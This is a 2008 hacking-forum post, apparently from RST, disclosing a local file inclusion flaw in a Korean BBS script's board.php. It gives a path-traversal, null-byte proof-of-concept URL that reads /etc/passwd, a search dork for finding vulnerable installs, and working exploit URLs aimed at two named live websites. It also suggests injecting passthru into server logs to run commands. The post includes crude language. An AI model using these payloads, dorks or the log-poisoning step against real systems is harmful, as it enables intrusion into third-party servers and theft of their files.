Guest Kenpachi Posted March 17, 2008 Report Share Posted March 17, 2008 BBS BOARD UNKNOWN VERSION (can't read fucking koreean ... sry )Bug type : Local File InclusionAffected file : board.phpAffected code : include "./board/" . $skin_dir . $Action . ".php" ;Stupid ass blocking code : if(!isset($Table) && empty($Table) && $Action != "total_list") AlertMessage("°Ô½ÃÆÇÀÇ Å×À̺íÀÌ ÁöÁ¤µÇÁö ¾Ê¾Ò½À´Ï´Ù! Å×À̺íÀ» ÁöÁ¤Çϼ¼¿ä.");Proof of concet: http://victim/[bbs path]/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=dfgdsaDork: inurl:"bbs/board.php?Action"And since I can't find a downloading site to prove my worthless LFI bug exists ... here's a couple of examples :http://east-one.kr/bbs/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=ahttp://www.sinhungsa.or.kr/bbs/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=aif you really want to read the source code ... find the logs on east-one.kr ... inject a passthru and do 'cat board.php' to see what I'm talking about :\//Kenpachi//http://rstcenter.com/forum//Nemessis + Ahead = BUTTSEX Quote Link to comment Share on other sites More sharing options...